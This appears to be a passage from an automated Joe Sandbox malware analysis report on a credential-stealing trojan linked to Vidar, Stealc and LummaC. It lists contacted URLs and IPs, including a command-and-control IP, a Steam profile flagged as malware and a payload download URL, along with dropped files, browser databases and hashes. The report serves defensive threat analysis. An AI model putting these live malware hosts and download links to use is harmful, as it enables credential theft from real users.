                            https://5.75.211.162AKKJDRegAsm.exe, 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=AAAAKJ.2.drfalse
                            • URL Reputation: safe
                            unknown
                            http://store.steampowered.com/subscriber_agreement/RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • URL Reputation: safe
                            unknown
                            https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgRegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=enRegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://steamcommunity.com/profiles/76561199780418869/inventory/RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • Avira URL Cloud: malware
                            unknown
                            https://steamcommunity.com/discussions/RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&aRegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://store.steampowered.com/stats/RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • URL Reputation: safe
                            unknown
                            https://store.steampowered.com/steam_refunds/RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchAAAAKJ.2.drfalse
                            • URL Reputation: safe
                            unknown
                            https://5.75.211.162/xmx~3RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            https://dbsmena.com/vdshfd.exetent-Disposition:RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://crl.entrust.net/ts1ca.crl0file.exefalse
                            • URL Reputation: safe
                            unknown
                            https://steamcommunity.com/workshop/RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://steamcommunity.com/6RegAsm.exe, 00000002.00000002.3293998119.0000000001331000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://store.steampowered.com/legal/RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • URL Reputation: safe
                            unknown
                            https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=eRegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • URL Reputation: safe
                            unknown
                            http://www.sqlite.org/copyright.html.RegAsm.exe, 00000002.00000002.3299208500.000000001C9E7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3304083321.000000002298D000.00000002.00001000.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://dbsmena.com/RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvRegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl76561199780418869[1].htm.2.drfalse
                            • URL Reputation: safe
                            unknown
                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoAAAAKJ.2.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://steamcommunity.com/login/home/?goto=profiles%2F7656119978041886976561199780418869[1].htm.2.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://5.75.211.162EBFBARegAsm.exe, 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            http://aia.entrust.net/ts1-chain256.cer01file.exefalse
                            • URL Reputation: safe
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
104.102.49.254 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | true
5.75.211.162 | unknown | Germany | 24940 | HETZNER-ASDE | true
172.105.54.160 | dbsmena.com | United States | 63949 | LINODE-APLinodeLLCUS | false
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1519637
                            Start date and time:2024-09-26 19:04:09 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 6m 54s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:7
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@5/25@2/3
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 91
                            • Number of non-executed functions: 260
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes were analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing disassembly code.
                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • VT rate limit hit for: file.exe
Time | Type | Description
13:05:35 | API Interceptor | 1x Sleep call for process: RegAsm.exe modified
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            104.102.49.254file.exeGet hashmaliciousUnknownBrowse
                              3ZD5tEC5DH.exeGet hashmaliciousLummaCBrowse
                                a7HdB2dU5P.exeGet hashmaliciousLummaCBrowse
                                  Z09QznvZSr.exeGet hashmaliciousUnknownBrowse
                                    file.exeGet hashmaliciousLummaC, VidarBrowse
                                      HHXyi02DYl.exeGet hashmaliciousLummaCBrowse
                                        bYQ9uTqLzz.exeGet hashmaliciousLummaCBrowse
                                          HHXyi02DYl.exeGet hashmaliciousUnknownBrowse
                                            SecuriteInfo.com.Win64.Malware-gen.15701.20735.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, MicroClipBrowse
                                              SecuriteInfo.com.Win64.Evo-gen.13360.8133.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                5.75.211.162file.exeGet hashmaliciousUnknownBrowse
                                                  Z09QznvZSr.exeGet hashmaliciousUnknownBrowse
                                                    file.exeGet hashmaliciousLummaC, VidarBrowse
                                                      file.exeGet hashmaliciousLummaC, VidarBrowse
                                                        file.exeGet hashmaliciousLummaC, VidarBrowse
                                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                            file.exeGet hashmaliciousLummaC, VidarBrowse
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              steamcommunity.comfile.exeGet hashmaliciousUnknownBrowse
                                                              • 104.102.49.254
                                                              3ZD5tEC5DH.exeGet hashmaliciousLummaCBrowse
                                                              • 104.102.49.254
                                                              a7HdB2dU5P.exeGet hashmaliciousLummaCBrowse
                                                              • 104.102.49.254
                                                              Z09QznvZSr.exeGet hashmaliciousUnknownBrowse
                                                              • 104.102.49.254
                                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                                              • 104.102.49.254
                                                              HHXyi02DYl.exeGet hashmaliciousLummaCBrowse
                                                              • 104.102.49.254
                                                              bYQ9uTqLzz.exeGet hashmaliciousLummaCBrowse
                                                              • 104.102.49.254
                                                              HHXyi02DYl.exeGet hashmaliciousUnknownBrowse
                                                              • 104.102.49.254
                                                              SecuriteInfo.com.Win64.Malware-gen.15701.20735.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, MicroClipBrowse
                                                              • 104.102.49.254
                                                              SecuriteInfo.com.Win64.Evo-gen.13360.8133.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                              • 104.102.49.254
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              LINODE-APLinodeLLCUShttp://rephase.aiGet hashmaliciousUnknownBrowse
                                                              • 45.33.30.197
                                                              https://shiseiki.com/Get hashmaliciousUnknownBrowse
                                                              • 172.104.100.133
                                                              file.exeGet hashmaliciousUnknownBrowse
                                                              • 139.162.110.14
                                                              http://trello.com/c/VmtGBtm4Get hashmaliciousHTMLPhisherBrowse
                                                              • 45.33.8.19
                                                              file.exeGet hashmaliciousUnknownBrowse
                                                              • 139.162.110.14
                                                              1445321243TK.pdfGet hashmaliciousUnknownBrowse
                                                              • 69.164.210.100
                                                              https://0nline1.worldsfree.online/?U0=axzRlLTExNmZlODFkZTkwZgAQAKBHMctqAUR3r65X8nGy3n0%3DGet hashmaliciousHTMLPhisherBrowse
                                                              • 139.162.182.75
                                                              5qcJn1lfO5.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                              • 45.79.190.156
                                                              https://wanshaofu.top/Get hashmaliciousHTMLPhisherBrowse
                                                              • 69.164.203.87
                                                              Ziraat Bankas#U0131 Swift Mesaj#U0131.docx.docGet hashmaliciousRemcos, PureLog StealerBrowse
                                                              • 45.79.190.156
                                                              AKAMAI-ASUSphish_alert_sp2_2.0.0.0(10).emlGet hashmaliciousHTMLPhisherBrowse
                                                              • 184.28.90.27
                                                              https://www.google.co.za/url?q=xtcjw2geVaKWnfmdoGJR&rct=plPBlHNa5kwdhss6Wkqp&sa=t&esrc=513lj8JvP7Ittpg5uakw&source=&cd=HEdeaS5QG8iPRKWBvNC5&cad=v3vi70ntSK6fhpPYoZj8&ved=blJ54Mupbf2HcJbicYcQ&uact=&url=amp/s%2Furl.za.m.mimecastprotect.com/s/BjZHCy856GFEJl8cZf1CxlF3BGet hashmaliciousUnknownBrowse
                                                              • 88.221.169.152
                                                              https://kusjp5q7xwyt.larksuite.com/wiki/XzhhwohBhigCbykSafAueRYKsXd?from=from_copylinkGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                              • 2.16.202.91
                                                              Final_Contract_Copy-532392974.pdfGet hashmaliciousUnknownBrowse
                                                              • 23.56.162.185
                                                              file.exeGet hashmaliciousUnknownBrowse
                                                              • 104.102.49.254
                                                              Final_Contract_Copy-532392974.pdfGet hashmaliciousUnknownBrowse
                                                              • 23.203.104.175
                                                              https://kusjp5q7xwyt.larksuite.com/wiki/XzhhwohBhigCbykSafAueRYKsXd?from=from_copylinkGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                              • 2.19.126.78
                                                              You have a held messages (dawie@ddebeer.co.za).msgGet hashmaliciousUnknownBrowse
                                                              • 184.28.90.27
                                                              https://topawardpicks.topGet hashmaliciousUnknownBrowse
                                                              • 23.220.132.219
                                                              https://storage.googleapis.com/inbound-mail-attachments-prod/0cbecb77-b573-4b3b-8c97-8b461d262d51?GoogleAccessId=distribution-controller-prod@inbound-mail-attachments.iam.gserviceaccount.com&Expires=1758806989&Signature=teNXGJRcW9uuEoVVvD0bLb%2BTGBorxpSu89OlgLR0AZpo8aoMl3JFsBDoXmLnj9QMk%2BAPu8iGsKTPrT4i0XSxxzRmtCLdsbDi23%2FFHfN4OpU3mOnUXtbZ81e7h5Ax%2FIygnxvogL7iGUXrqQUBZEnVkPmXcpAMmBTX7%2Bj4kVf57xBQo4WA9yGdv5Df4b9nDGZMXEYZVxWjPtOk4%2FXapMoV5bYJLgpB%2BR%2F1LUE0IwT1d3wuv1q6TONtaWwducy4mc1%2FJvGqxFuxuW9Y6Ojq%2B7a%2FqCW4DaFdd42O6ViY63C8G7dPbTe9LtxhwHcAk9xg3n5kXh2Z75tDAkK2Ak5mKneP6g%3D%3DGet hashmaliciousUnknownBrowse
                                                              • 184.28.90.27
                                                              HETZNER-ASDEfile.exeGet hashmaliciousUnknownBrowse
                                                              • 5.75.211.162
                                                              g3V051umJf.htmlGet hashmaliciousUnknownBrowse
                                                              • 195.201.215.225
                                                              https://iskiosvillas.gr/booking/AAMAyYwBGAAAAAAB2B1ZmTNuNBwBbZXOiMVmgTZdxswVIV.htmlGet hashmaliciousUnknownBrowse
                                                              • 78.46.90.29
                                                              Contract_Agreement_Wednesday September 2024.pdfGet hashmaliciousUnknownBrowse
                                                              • 88.198.19.212
                                                              Z09QznvZSr.exeGet hashmaliciousUnknownBrowse
                                                              • 5.75.211.162
                                                              https://is.gd/fxcRirGet hashmaliciousUnknownBrowse
                                                              • 168.119.146.39
                                                              https://bostempek.vercel.app/Get hashmaliciousPorn ScamBrowse
                                                              • 136.243.69.157
                                                              https://312d5c44.flca.pages.dev/Get hashmaliciousTechSupportScamBrowse
                                                              • 195.201.57.90
                                                              https://gkiqlhmli3lp80l.pages.dev/Get hashmaliciousUnknownBrowse
                                                              • 195.201.57.90
                                                              https://jm7lqhyjh4wb0gyyvrq.pages.dev/Get hashmaliciousUnknownBrowse
                                                              • 195.201.57.90
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              51c64c77e60f3980eea90869b68c58a8file.exeGet hashmaliciousUnknownBrowse
                                                              • 5.75.211.162
                                                              Z09QznvZSr.exeGet hashmaliciousUnknownBrowse
                                                              • 5.75.211.162
                                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                                              • 5.75.211.162
                                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                                              • 5.75.211.162
                                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                                              • 5.75.211.162
                                                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                              • 5.75.211.162
                                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                                              • 5.75.211.162
                                                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                              • 5.75.211.162
                                                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                              • 5.75.211.162
                                                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                              • 5.75.211.162
Match: 37f463bf4616ecd445d4a1937da06e19
file.exe | malicious | Unknown | 104.102.49.254, 172.105.54.160
e.dll | malicious | Dridex Dropper | 104.102.49.254, 172.105.54.160
e.dll | malicious | Dridex Dropper | 104.102.49.254, 172.105.54.160
Payment copy.vbs | malicious | FormBook, GuLoader | 104.102.49.254, 172.105.54.160
Z09QznvZSr.exe | malicious | Unknown | 104.102.49.254, 172.105.54.160
PERMINTAAN ANGGARAN (Universitas IPB) ID177888.vbe | malicious | GuLoader, Lokibot | 104.102.49.254, 172.105.54.160
PersonalizedOffer.exe | malicious | UltraVNC | 104.102.49.254, 172.105.54.160
PersonalizedOffer.exe | malicious | UltraVNC | 104.102.49.254, 172.105.54.160
38sab1rT0H.exe | malicious | Latrodectus | 104.102.49.254, 172.105.54.160
file.exe | malicious | LummaC, Vidar | 104.102.49.254, 172.105.54.160
Associated Sample Name / URL | Detection | Threat Name

Match: C:\ProgramData\freebl3.dll
file.exe | malicious | Stealc, Vidar
file.exe | malicious | Amadey, Stealc, Vidar
file.exe | malicious | Stealc, Vidar
file.exe | malicious | Stealc, Vidar
file.exe | malicious | LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer
file.exe | malicious | Stealc, Vidar
file.exe | malicious | Stealc, Vidar
file.exe | malicious | Stealc, Vidar
file.exe | malicious | Stealc, Vidar
file.exe | malicious | LummaC, Vidar

Match: C:\ProgramData\mozglue.dll
file.exe | malicious | Stealc, Vidar
file.exe | malicious | Amadey, Stealc, Vidar
file.exe | malicious | Stealc, Vidar
file.exe | malicious | Stealc, Vidar
file.exe | malicious | LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer
file.exe | malicious | Stealc, Vidar
file.exe | malicious | Stealc, Vidar
file.exe | malicious | Stealc, Vidar
file.exe | malicious | Stealc, Vidar
file.exe | malicious | LummaC, Vidar
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):263908
                                                                                                      Entropy (8bit):7.998846488868232
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:3072:CEJhujqDU1ByHguzD/FN56N4UV9qMuoTfXzksKk+3AwMQmBbsvsuikkAlrweSdvG:CQuuGQX/FN5CVU03+wwybsDV3SdO
                                                                                                      MD5:21504B52DAA4C04B619A19E6EDC54CD1
                                                                                                      SHA1:5F4F51F69B964DE390ADB06822D25164B6B77958
                                                                                                      SHA-256:5F701B9AAD60C098DC1D36FC83C660D67FFF172A4DEDB3DE351506FA435B152D
                                                                                                      SHA-512:52A55DAEA6755C80A1AD0855E1F65179AC58DCD7739EC3B49079C90312548FF9169024B82B5AA6D2DCD82F1644955DBC22D4BDD874396EDA92D3D8AF01D8544F
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                      Category:dropped
                                                                                                      Size (bytes):106496
                                                                                                      Entropy (8bit):1.136413900497188
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                      Malicious:false
                                                                                                      Reputation:high, very likely benign file
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                      Category:dropped
                                                                                                      Size (bytes):20480
                                                                                                      Entropy (8bit):0.8439810553697228
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                      MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                      SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                      SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                      SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                      Malicious:false
                                                                                                      Reputation:high, very likely benign file
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                      Category:dropped
                                                                                                      Size (bytes):98304
                                                                                                      Entropy (8bit):0.08235737944063153
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                      Malicious:false
                                                                                                      Reputation:high, very likely benign file
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):32768
                                                                                                      Entropy (8bit):0.017262956703125623
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                      Malicious:false
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      File Type:ASCII text, with very long lines (1743), with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):9504
                                                                                                      Entropy (8bit):5.512408163813622
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
                                                                                                      MD5:1191AEB8EAFD5B2D5C29DF9B62C45278
                                                                                                      SHA1:584A8B78810AEE6008839EF3F1AC21FD5435B990
                                                                                                      SHA-256:0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
                                                                                                      SHA-512:86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
                                                                                                      Malicious:false
                                                                                                      Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                      Category:dropped
                                                                                                      Size (bytes):51200
                                                                                                      Entropy (8bit):0.8746135976761988
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                      Malicious:false
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                      Category:dropped
                                                                                                      Size (bytes):159744
                                                                                                      Entropy (8bit):0.5394293526345721
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                      MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                      SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                      SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                      SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                      Malicious:false
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                      Category:dropped
                                                                                                      Size (bytes):5242880
                                                                                                      Entropy (8bit):0.03859996294213402
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                                                                                      MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                                                                                      SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
